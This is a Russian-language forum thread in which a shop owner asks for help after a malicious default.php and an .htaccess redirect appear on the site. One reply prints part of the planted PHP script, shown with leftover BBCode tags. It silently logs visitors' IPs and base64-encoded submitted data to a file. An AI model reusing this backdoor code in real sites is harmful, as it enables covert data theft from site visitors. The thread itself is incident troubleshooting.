ANTICHAT - default.php

ANTICHAT (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - default.php (https://forum.antichat.xyz/showthread.php?t=369293)

Привет народ, снедавних пор на моем сайте стали проиходить чудеса. Появляется скрипт с содержанием:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

Так вот я вроде всё делал как на любимом форуме написано, все данные внешние перед запросом обрабатывал функцией mysql_real_escape_string, где переменная цифровая проверял цифровая ли она и тп, а получается есть sqlinj.

Друзья, как быть?

То просто фаил появлялся, а теперь htaccess ставится редирект на какойто ГС...

Может проблема не в Вас в соседе который тоже находится на этом сервере? Обратитесь с проблемой к хостингу провайдеру. Пусть они проверят логи, откуда, что и куда...

Аж греют душу такие сообщения =))))))))))))))))))) (Гомерический хохот за кадром)

cat1vo, Да вот дело в том что логи предоставляются, а в них грамота филькина. Вроде как во мне причина...

Cennarios, есть замечательный русские поговорки про радость чужим неудачам...

ТС, убирай этот код, закрывай дыры, ищи среди файлов шеллы, а также минишеллы записанные среди кода твоих основных файлов, прост посмотри какие в последнийраз менялись и быстро найдёшь

Что за проект?=)

дай ссылку на этот файл, посмотрим

qaz, так могли дату обновления подменить)

Минишел - это запрос к текстовому фаилу с последущей генерацией на сервере шела?)

cLauZ, интернет-магазин

йож, так содержание фаила выложено.

Предоставили мне логи, а там жесть какаято. Щас буду учиться читать логи. Но как я понимаю фаила с дырой мне не скажут логи?)

Цитата:

Сообщение от Asbury

Появляется скрипт с содержанием:

вот если надо, чё там внутри...

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) print[/COLOR][COLOR="#DD0000"]'STATUS-IMPORT-OK'[/COLOR][COLOR="#007700"];

    if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]) { 

[/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]=@[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'tmpfile'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]);

        @[/COLOR][COLOR="#0000BB"]flock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]LOCK_EX[/COLOR][COLOR="#007700"]);

        @[/COLOR][COLOR="#0000BB"]fputs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"\t"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"]);

        @[/COLOR][COLOR="#0000BB"]flock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]LOCK_UN[/COLOR][COLOR="#007700"]);

        @[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]);

    } 

} 

exit;

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]

могу ли я запись:

Tue Nov 06 18:36:02 2012 0 ::ffff:65.254.224.34 3040 /home/users1/a/user_name/default.php b _ i r юзер ftp 0 * c

интерпретировать, как косяк со стороны хостинга?!

Получается что фаил был внезапно скачан в корневую директорию ftp, а не в один из сайтов на ftp, за которые спрос был бы с меня?